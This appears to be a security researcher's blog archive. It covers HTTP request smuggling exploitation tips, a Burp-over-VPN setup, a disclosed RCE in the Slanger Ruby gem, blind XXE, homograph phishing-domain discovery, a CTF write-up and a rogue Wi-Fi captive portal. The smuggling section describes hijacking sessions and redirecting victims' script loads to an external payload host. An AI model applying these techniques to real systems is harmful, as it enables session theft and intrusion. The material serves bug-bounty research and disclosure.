  • Make sure the server does not receive multiple Host headers, e.g. by pushing the appended request into the POST body of your smuggled request;
  • Sometimes it helps to troubleshoot these kinds of issues if you can find a different page that reflects your poisoned HTTP request, e.g. a page that returns values from POST bodies, such as an error page with an error message. If you can read the contents of your relayed request, you might figure out why your payload is not accepted by the server;
  • If the server is behind a typical load balancer like Cloudflare, Akamai or similar, see if you can find its public IP via a service like SecurityTrails and point the HTTP request smuggling attack directly at this “backend”;
  • I have seen cases where the non-encrypted (HTTP) service listening on the server is vulnerable to HTTP request smuggling attacks, whereas the secure channel (HTTPS) service isn’t, and the other way around. Ensure you test and investigate the impact of both services separately. For example, when HTTP is vulnerable, but all application logic is only served on HTTPS pages, you will have a hard time abusing application logic to demonstrate impact.

#5 – Build a good POC

  • If you are targeting application logic and you can exfiltrate the full HTTP body of arbitrary requests, that basically boils down to a session hijacking attack of arbitrary victims hitting your poisoned requests, because you can view the session cookies in the request headers and are not hindered by browser-side mitigations like the http-only flag in a typical XSS scenario. This is the ideal scenario from an attacker’s point of view;
  • Once you have found a successful redirect, try poisoning a few requests and monitor your attacker server to see what information is sent your way. Typically a browser will not include session cookies when redirecting the client to a different domain, but sometimes headless clients are less secure: they may not expect redirects, and might send sensitive information even when redirected to a different server. Make sure to inspect GET parameters, POST bodies and request headers for juicy information;
  • When a redirect is successful, but you are not getting anything sensitive your way, find a page that includes JavaScript files to turn the request poisoning into a stored XSS, ensure your redirect points to a JavaScript payload (e.g. https://xss.honoki.net/), and create a POC that generates a bunch of iframes with the vulnerable page while poisoning the requests, until one of the <script> tags ends up hitting the poisoned request, and redirects to the malicious script;
  • If the target is as static as it gets, and you cannot find a redirect, or there isn’t a page that includes a local JavaScript file, consider holding on to the vulnerability in case you can chain it with a different one instead of reporting it as is. Most bug bounty programs will not accept or reward a HTTP request smuggling vulnerability if you cannot demonstrate a tangible impact.

Finally, keep in mind to act responsibly when testing for HTTP request smuggling, and always consider the impact on production services. When in doubt, reach out to the people running the show to ensure you are not causing any trouble.

How to: Burp ♥ OpenVPN

Update February 2024: Most of the contents of this article can now be achieved with this Burp plugin that I wrote: https://github.com/honoki/burp-digitalocean-droplet-openvpn – make sure to give it a spin!

When performing security tests, you will often be required to send all of your traffic through a VPN. If you don’t want to send all of your local traffic over the same VPN, configuring an easy-to-use setup can sometimes be a pain. This post outlines one possible way of configuring Burp Suite to send all its traffic through a remote VPN, without having to run the VPN on your own machine.

In this guide, I will describe a setup that makes use of the following tools. Note, however, that most of these can be replaced by similar tools to accomplish the same goals.

  • Burp Suite
  • PuTTY
  • OpenVPN running on a Virtual Private Server (VPS)
  • A second VPS as a jumphost (not required if you have a static IP)
  • Browser extension Switchy Omega in Chrome or Firefox

Why?

There are a few reasons why configuring a VPN to execute your security tests may be a good idea:

  1. Testing assets that are not publicly available, e.g. located on an internal network; this is often the case when performing internal infrastructure tests or tests against UAT environments;
  2. Testing public assets from a whitelisted environment, e.g. web applications that are usually hidden behind a WAF, applications that are internet-accessible, but only available to a number of whitelisted networks, etc;
  3. Bug bounty programs that require the use of their VPN as a condition to participate in the program.

To accommodate this need, you may be inclined to install an OpenVPN client on your local testing machine and get going. While this definitely works, I found that separating my testing activities from other network activity is not only a privacy-conscious decision, but also helps free up as much of the VPN bandwidth as possible, because it is no longer occupied by superfluous traffic.

The setup

Architecturally, the solution that I will describe looks like this:

High-level diagram of proxying traffic through a VPN using Burp Suite.

VPN tunnel

The VPN tunnel is of course the core of this setup, and will allow you to tunnel your (selected) traffic either towards assets inside a target’s environment, or towards internet-accessible assets, but originating from the target’s network. In other words, the web applications you are testing will see you coming from Target X’s IP address range, rather than from your own.

Jump host

If you have a static IP on your home or office network, or this is intended as a temporary setup (i.e. your current IP will do), you can skip this.

Otherwise, this jump host will serve as a bridge towards your VPN-connected EC2 instance. Most importantly, the VPS’s static IP will allow us to exclude traffic to and from this jump host from being sent over the VPN.

On this jump host, make sure you have access to the EC2 instance’s private key (if applicable), and set up a SOCKS proxy using the following command:

ssh -i ~/ssh-private-key.pem -D 2222 ubuntu@<ec2-instance-ip>

This will set up an SSH tunnel that redirects all traffic proxied through port 2222 on the jump host towards its original destination via the AWS EC2 instance (i.e. through the VPN when the VPN is activated).
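To sanity-check the tunnel from the jump host, you can request your apparent egress IP through the SOCKS proxy. A quick sketch in Python, assuming the requests package with SOCKS support installed (pip install requests[socks]):

import requests

# route traffic through the SSH SOCKS tunnel on port 2222;
# socks5h also resolves DNS on the far end of the tunnel
proxies = {
    "http": "socks5h://127.0.0.1:2222",
    "https": "socks5h://127.0.0.1:2222",
}
# should print the VPN's egress IP once the VPN is up
print(requests.get("https://ifconfig.co/ip", proxies=proxies, timeout=10).text)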

AWS EC2 instance

Because it’s cheap, I opted for a t2.micro instance in AWS EC2 to set up the connection with the VPN. I am a fan of Debian, so I spun up an Ubuntu 18.04 image. Once up and running, you will need the following configured:

  • Install OpenVPN;
  • Upload the ovpn file containing the config of the VPN you want to connect to;
  • Whitelist your jump host (or home/office IP) from the VPN by directing traffic through the usual gateway (source);
  • Whitelist any local DNS servers if needed;
# install OpenVPN client
sudo apt install openvpn

# find out and write down your local gateway's IP address
netstat -anr

# find out and write down your local DNS servers' IP addresses
# (I needed this to allow DNS resolution in AWS EC2 when the VPN is running)
systemd-resolve --status

# Make sure both IPs you wrote down are not redirected through the VPN:
sudo route add -host <your-jumphost-ip> gw <your-local-gateway>
sudo route add -host <your-local-dns-server> gw <your-local-gateway>

# Start the VPN!
sudo openvpn --config ./openvpn-config.ovpn --daemon

Local configuration

The final steps to get this to work are:

  1. Set up local port forwarding to the SOCKS proxy on your jump host;
  2. Configure Burp Suite to use the forwarded local port as a SOCKS proxy;
  3. Use the Switchy Omega browser extension to send only selected sites towards Burp Suite and through the VPN

On Windows, using PuTTY, you can use the following configuration to forward local port 31337 to your jump host on port 2222:

Note that “localhost” in this screenshot is relative to the remote server.

In Burp Suite, go to either User Options or Project Options, and configure SOCKS proxy to point to your localhost on port 31337:

Finally, point your Switchy Omega to your Burp proxy for selected sites:


Before kicking off your tests, I recommend you verify your public IP by browsing to a site like ifconfig.co or ipchicken.com with your proxy enabled.
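If you prefer to script that check, something along these lines (assuming Burp’s default proxy listener on 127.0.0.1:8080) should print the VPN’s egress IP rather than your own:

import requests

# proxy the request through Burp's default listener;
# verify=False because Burp re-signs TLS with its own CA
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
print(requests.get("https://ifconfig.co/ip", proxies=proxies,
                   verify=False, timeout=10).text)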

Pros / cons

The described setup has a few (dis)advantages worth mentioning:

Pros

  • Reserve the VPN bandwidth to testing activities only, which can considerably improve your connection speed over a sometimes shaky VPN;
  • Separate your “background” network traffic from the VPN traffic, ensuring your privacy isn’t at risk when testing from your personal device;
  • The AWS EC2 instance can be shut down in-between tests, ensuring your bill doesn’t keep growing overnight;
  • You can configure multiple devices to connect through a single VPN connection by pointing them to the same SOCKS proxy on the jump host.

Cons

  • The setup is slightly more convoluted than just running your OpenVPN client on your local machine;
  • In case of a failing VPN connection on the AWS EC2 instance, you may be executing tests outside of the VPN-ed environment without you noticing;
  • When configuring per-domain proxy settings, web application traffic that hits other domains will not be proxied, possibly leading to unexpected results.

I’d love to hear your thoughts on this! Did you use a similar approach? Do you have suggestions to improve or simplify this setup? Let me know in the comments below.

RCE in Slanger, a Ruby implementation of Pusher

While researching a web application last February, I learned about Slanger, an open source server implementation of Pusher. In this post I describe the discovery of a critical RCE vulnerability in Slanger 0.6.0, and the efforts that followed to responsibly disclose the vulnerability.

SECURITY NOTICE – If you are making use of Slanger in your products, stop reading and get your security fix first! A patch is available on GitHub or as part of the Ruby gem in version 0.6.1.

Pusher vs. Slanger

Pusher is a product that provides a number of libraries to enable the use of WebSockets in a variety of programming languages. WebSockets, according to their website, “represent a standard for bi-directional realtime communication between servers and clients.”

Some of the functionalities offered by Pusher include subscribing to and unsubscribing from public and private channels. For example, the following WebSocket request would result in a user subscribing to the channel “presence-example-channel”:

{
  "event": "pusher:subscribe",
  "data": {
    "channel": "presence-example-channel",
    "auth": "<APP_KEY>:<server_generated_signature>",
    "channel_data": "{
      \"user_id\": \"<unique_user_id>\",
      \"user_info\": {
        \"name\": \"Phil Leggetter\",
        \"twitter\": \"@leggetter\",
        \"blogUrl\":\"http://blog.pusher.com\"
      }
    }"
  }
}

While researching a web application, I learned about Slanger, an open-source Ruby implementation that “speaks” the Pusher protocol. In other words, it is a free alternative to Pusher that can be spun up as a stand-alone server in order to accept and process messages like the example above. At the time of writing, the vulnerable library has over 45,000 downloads on Rubygems.org.

I was able to determine what library was being used when the following error message was returned in response to my invalid input:

Request

socket = new WebSocket("wss://push.example.com/app/<app-id>?");
socket.send("test")

Response

{"event":"pusher:error","data":"{\"code\":500,\"message\":\"expected true at line 1, column 2 [parse.c:148]\\n /usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/lib/slanger/handler.rb:28:in `load'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/lib/slanger/handler.rb:28:in `onmessage'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/lib/slanger/web_socket_server.rb:30:in `block (3 levels) in run'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/connection.rb:18:in `trigger_on_message'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/message_processor_06.rb:52:in `message'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/framing07.rb:118:in `process_data'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/handler.rb:47:in `receive_data'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/connection.rb:76:in `receive_data'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/eventmachine-1.0.9.1/lib/eventmachine.rb:193:in `run_machine'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/eventmachine-1.0.9.1/lib/eventmachine.rb:193:in `run'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/bin/slanger:106:in `<main>'\"}"}

Note the occurrence of gem slanger-0.6.0, which appears to point to this open-source Ruby project on GitHub. With all the source code at my disposal, my attention was drawn to the file handler.rb, which contained the following function responsible for handling incoming WebSocket messages:

def onmessage(msg)
  msg = Oj.load(msg)
  msg['data'] = Oj.load(msg['data']) if msg['data'].is_a? String
  event = msg['event'].gsub(/\Apusher:/, 'pusher_')
  if event =~ /\Aclient-/
    msg['socket_id'] = connection.socket_id
    Channel.send_client_message msg
  elsif respond_to? event, true
    send event, msg
  end
end

Since msg is the string that comes from the user’s end of the two-way communication, that gives us considerable control over this function. In particular, when trying to understand what Oj.load is supposed to do, this code started to look promising — from an attacker’s perspective.

Ruby unmarshalling

As it turns out, Oj (short for “Optimized JSON”) is a “fast JSON parser and Object marshaller as a Ruby gem.” Now that is interesting. From earlier experience, I knew that Ruby marshalling can lead to remote code execution vulnerabilities.

From online documentation, I learned that Oj allows serialization and deserialization of Ruby objects by default. For example, the following string is the result of an object of the class Sample::Doc being serialized with Oj.dump(sample).

{"^o":"Sample::Doc","title":"Sample","user":"ohler","create_time":{"^t":1371361533.272099000},"layers":{},"change_history":[{"^o":"Sample::Change","user":"ohler","time":{"^t":1371361533.272106000},"comment":"Changed at t+0."}],"props":{":purpose":"an example"}}

So presumably, passing a similarly serialized object via socket.send(...) should result in our input being “unmarshalled” by the underlying code in Slanger. All that now stands between an attacker’s input and remote code execution is the availability of classes and objects that can be manipulated into executing system commands.
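As a quick illustration of that hypothesis, a probe along these lines (a sketch using the websocket-client package, with the placeholder endpoint from earlier) lets you observe how the server reacts when it receives a serialized object instead of plain JSON:

from websocket import create_connection

# connect to the Pusher-compatible endpoint from earlier (placeholder)
ws = create_connection("wss://push.example.com/app/<app-id>")
# send a harmless Oj-serialized object and observe how
# Oj.load handles it on the server side
ws.send('{"^o":"Sample::Doc","title":"Sample","user":"ohler"}')
print(ws.recv())
ws.close()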

Since the Ruby gem appears to have a dependency on the Rails environment, I could build on earlier work by Charlie Somerville to construct a working payload that would lead to remote command execution in two different ways, one of which did not require knowing the app key. See the exploit in action in the video below.

Continue reading on the next page for an account of how I tried to responsibly disclose this bug.

A lot of coffee went into the writing of this article. If it helped you stay secure, please consider buying me a coffee, or invite me to your bug bounty program. 🙂


From blind XXE to root-level file read access

Polyphemus, by Johann Heinrich Wilhelm Tischbein, 1802 (Landesmuseum Oldenburg)

On a recent bug bounty adventure, I came across an XML endpoint that responded interestingly to attempted XXE exploitation. The endpoint was largely undocumented, and the only reference to it that I could find was an early 2016 post from a distraught developer in difficulties.

Below, I will outline the thought process that helped me make sense of what I encountered, and that in the end allowed me to elevate what seemed to be a medium-criticality vulnerability into a critical finding.

I will put deliberate emphasis on the various error messages that I encountered in the hope that it can point others in the right direction in the future.

Note that I have anonymised all endpoints and other identifiable information, as the vulnerability was reported as part of a private disclosure program, and the affected company does not want any information regarding their environment or this finding to be published.


Punicoder – discover domains that are phishing you

So we’re seeing homograph attacks again. Examples show how ‘apple.com’ and ‘epic.com’ can be mimicked through Internationalized Domain Names (IDN) consisting entirely of Unicode lookalike characters, i.e. xn--80ak6aa92e.com and xn--e1awd7f.com respectively.
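Python’s built-in IDNA codec offers a quick way to see how such a lookalike encodes. In the sketch below, the first character of the domain is the Cyrillic letter а (U+0430), not a Latin a:

# the first character is Cyrillic U+0430, a visual twin of the Latin "a"
lookalike = "\u0430pple.com"
print(lookalike)                  # аpple.com
print(lookalike.encode("idna"))   # b'xn--pple-43d.com'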

As I found myself looking for ways to discover domain names that could be used for phishing attempts, I created a Python script called Punicoder to do the hard work for me. See the screenshot below for example output, and try it out for yourself here.

Punicoder output

Pro tip: use the following series of commands to find out if any of these domains resolve:

pieter@ubuntu:~$ python punicoder.py google.com | cut -d' ' -f2 | nslookup | grep -Pzo '(?s)Name:\s(.*?)Address: (.*?).Server'
Name: xn--oogle-qmc.com
Address: 185.53.178.7
Server
Name: xn--gogl-0nd52e.com
Address: 216.239.32.27
Server
Name: xn--gogl-1nd42e.com
Address: 216.239.32.27
Server
Name: xn--oole-z7bc.com
Address: 50.63.202.59
Server
Name: xn--goole-tmc.com
Address: 75.119.220.238
Server
Name: xn--ggle-55da.com
Address: 216.239.32.27
Server

Hack.lu 2015: Creative Cheating

Write-up of Hack.lu 2015’s Creative Cheating challenge.

The first challenge I solved at Hack.lu 2015, hosted by FluxFingers, was Creative Cheating.

The challenge

Mr. Miller suspects that some of his students are cheating in an automated computer test. He captured some traffic between crypto nerds Alice and Bob. It looks mostly like garbage but maybe you can figure something out. He knows that Alice’s RSA key is (n, e) = (0x53a121a11e36d7a84dde3f5d73cf, 0x10001) (192.168.0.13) and Bob’s is (n, e) = (0x99122e61dc7bede74711185598c7, 0x10001) (192.168.0.37)

The solution

Upon inspection of the packet capture, we notice that every packet from Alice (192.168.0.13) to Bob (192.168.0.37) contains a base64-encoded payload, e.g.:

U0VRID0gNDsgREFUQSA9IDB4MmMyOTE1MGYxZTMxMWVmMDliYzlmMDY3MzVhY0w7IFNJRyA9IDB4MTY2NWZiMmRhNzYxYzRkZTg5ZjI3YWM4MGNiTDs=
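Decoding the payload locally reveals the structure of the messages:

import base64

payload = ("U0VRID0gNDsgREFUQSA9IDB4MmMyOTE1MGYxZTMxMWVmMDliYzlmMDY3MzVhY0w7"
           "IFNJRyA9IDB4MTY2NWZiMmRhNzYxYzRkZTg5ZjI3YWM4MGNiTDs=")
print(base64.b64decode(payload).decode())
# SEQ = 4; DATA = 0x2c29150f1e311ef09bc9f06735acL; SIG = 0x1665fb2da761c4de89f27ac80cbL;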


How to set up a Wifi captive portal

Goals

The objective of this Wifi captive portal is to mimic the behaviour of a legitimate access point protected by a portal login page, for demonstration purposes. That includes the following:

  • Broadcast a rogue access point
  • Mimic captive portal behaviour:
    • User gets to see a login page when trying to connect;
    • After logging in, the user can continue to access the network and surf freely.
